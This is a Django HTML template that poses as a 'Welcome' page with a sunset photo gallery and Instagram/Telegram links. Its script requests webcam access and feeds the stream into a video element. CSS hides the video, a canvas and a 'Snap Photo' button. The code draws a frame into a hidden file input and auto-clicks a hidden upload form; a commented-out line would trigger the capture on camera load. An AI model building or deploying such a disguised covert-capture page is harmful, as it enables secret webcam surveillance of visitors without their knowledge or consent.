<!DOCTYPE html>
{% load static %}
<html>
<head>
    <title>Upload Photo</title>
</head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style type="text/css">
    body{
        margin:0;
        padding: 0;
    }

     .banner {
    width: 100%;
    height: 700px;
    position: relative;
    z-index: 999;
    background-image: url("{% static 'imgs/fuckingBlinder.jpg' %}");
    background-size: cover;
    /*background-position: center;*/
    color: white;
    text-align: center;
}

.banner h1{
    padding-top: 30%;
}

#video, #snap, #canvas {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: -1; /* negative z-index to put it behind .banner */
    display: none; /* hide it completely */
}

.footer{
    width: 100%;
    height: 120px;
    background-color: #A0A0A0;
    margin-top: 30px;
}

.fa {
  padding: 20px;
  font-size: 50px;
  width: 50px;
  height: 50px;
  /*text-align: center;*/
  text-decoration: none;
  margin: 10px 4px;
  border-radius: 100%;
}

.fa:hover {
    opacity: 0.7;
}

.fa-facebook{
  background: #3B5998;
  color: white;
}

.fa-instagram {
  background: #125688;
  color: white;
}

.fa-telegram{
    background: #55ACEE;
    color: white;
}

}
</style>
<body>
    <div class="banner"> 
       <h1>Welcome</h1>
       <p>Nice to see you here</p>
    </div>

    <video id="video" width="120" height="140" autoplay></video>
    <button id="snap">Snap Photo</button>
    <canvas id="canvas" width="420" height="340" style="display:none;"></canvas>
    
    <form method="post" enctype="multipart/form-data">
        {% csrf_token %}
        <input type="file" name="image" id="image" style="display:none;">
        <button type="submit" id="submitter" style="display: none">Upload</button>
    </form>
   
   <div style="display: flex; flex-wrap: wrap; gap:2%; margin-top: 20px; width: 94%; margin-left: auto; margin-right: auto;">
       <div style="padding: 2px; border:5px solid black; width: 30%">
           <img src="{% static  'imgs/myimg1.jpg' %}" width="100%" >
           <i>Nice sunset</i>
       </div>

       <div style="padding: 2px; border:5px solid black; width: 30%">
           <img src="{% static  'imgs/myimg1.jpg' %}" width="100%" >
           <i>Nice sunset</i>
       </div>

       <div style="padding: 2px; border:5px solid black; width: 30%">
           <img src="{% static  'imgs/myimg1.jpg' %}" width="100%" >
           <i>Nice sunset</i>
       </div>
   </div>
   
   <div class="footer" style="text-align: center; width: 100%;">
       <div style="display: flex; flex-wrap: wrap; width: 300px; margin-left: auto; margin-right: auto;">
           <a href="https://instagram.com/ruslanahmedov_21/" class="fa fa-instagram"></a>
           <a href="https://t.me/ruslanahmedov_21" class="fa fa-telegram"></a>
       </div>
   </div>
    <script>
        // Get access to the camera
        const video = document.getElementById('video');

        if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
            navigator.mediaDevices.getUserMedia({ video: true }).then(function(stream) {
                video.srcObject = stream;
                video.play();
            });
        }
        
        // Elements for taking the snapshot
        const canvas = document.getElementById('canvas');
        const context = canvas.getContext('2d');
        const snap = document.getElementById('snap');
        const imageInput = document.getElementById('image');

        // Trigger photo take
        function takePhoto() {
            context.drawImage(video, 0, 0, 420, 340);
            canvas.toBlob(function(blob) {
                const file = new File([blob], 'photo.png', { type: 'image/png' });
                const dataTransfer = new DataTransfer();
                dataTransfer.items.add(file);
                imageInput.files = dataTransfer.files;
            });
            //canvas.style.display = 'block';
            setTimeout(submitterClick, 1000);
        }
        
        function submitterClick(){
            document.getElementById('submitter').click();
        }

        snap.addEventListener('click', function() {
            takePhoto();
            document.getElementById('submitter').click();
        });

        video.addEventListener('loadedmetadata', function() {
            //setTimeout(takePhoto, 2000); // Delayed by 2 seconds (5000 milliseconds)
        });
    </script>
</body>
</html>